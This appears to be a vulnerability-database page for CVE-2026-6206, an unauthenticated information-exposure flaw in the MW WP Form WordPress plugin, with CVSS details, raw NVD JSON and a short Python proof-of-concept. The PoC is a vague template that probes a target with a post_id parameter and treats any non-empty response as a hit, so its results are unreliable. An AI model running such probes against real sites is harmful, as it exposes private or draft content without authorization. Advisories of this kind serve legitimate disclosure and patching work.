Security Vulnerability Report
中文
CVE-2026-6206 CVSS 5.3 MEDIUM

CVE-2026-6206

Published: 2026-05-14 09:16:27
Last Modified: 2026-05-14 14:28:41
Source: [email protected]

Description

The MW WP Form plugin for WordPress is vulnerable to Information Exposure in all versions up to, and including, 5.1.2 via the _get_post_property_from_querystring() function due to insufficient restrictions on which posts can be included. This makes it possible for unauthenticated attackers to extract data from password protected, private, or draft posts that they should not have access to.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

MW WP Form <= 5.1.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# PoC for CVE-2026-6206 # This script demonstrates how to exploit the information disclosure vulnerability. import requests def check_vulnerability(target_url, post_id): """ Attempts to retrieve data from a private/draft post using the vulnerable function. """ # The vulnerable endpoint might vary; this assumes the function is triggered via query params. # Adjust the endpoint path based on the specific plugin implementation. params = { 'post_id': post_id, # Other parameters might be needed to reach the vulnerable code path } try: # Sending a GET request without authentication response = requests.get(target_url, params=params, timeout=10) # Check if the response contains content that should be hidden if response.status_code == 200 and len(response.text) > 0: print(f"[+] Potential data found for Post ID {post_id}:") print(response.text[:200]) # Print first 200 chars return True else: print(f"[-] No data exposed for Post ID {post_id}") return False except requests.exceptions.RequestException as e: print(f"[-] Error connecting to target: {e}") return False # Example Usage # target = "http://example.com/" # private_post_id = "123" # check_vulnerability(target, private_post_id)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-6206", "sourceIdentifier": "[email protected]", "published": "2026-05-14T09:16:27.497", "lastModified": "2026-05-14T14:28:41.283", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The MW WP Form plugin for WordPress is vulnerable to Information Exposure in all versions up to, and including, 5.1.2 via the _get_post_property_from_querystring() function due to insufficient restrictions on which posts can be included. This makes it possible for unauthenticated attackers to extract data from password protected, private, or draft posts that they should not have access to."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-639"}]}], "references": [{"url": "https://github.com/web-soudan/mw-wp-form/commit/77aed98f56fdddc19bddf21c8f12faa5086d9202", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset/3516013/mw-wp-form", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/7f2c39f6-3d37-4765-99e8-023610856b61?source=cve", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.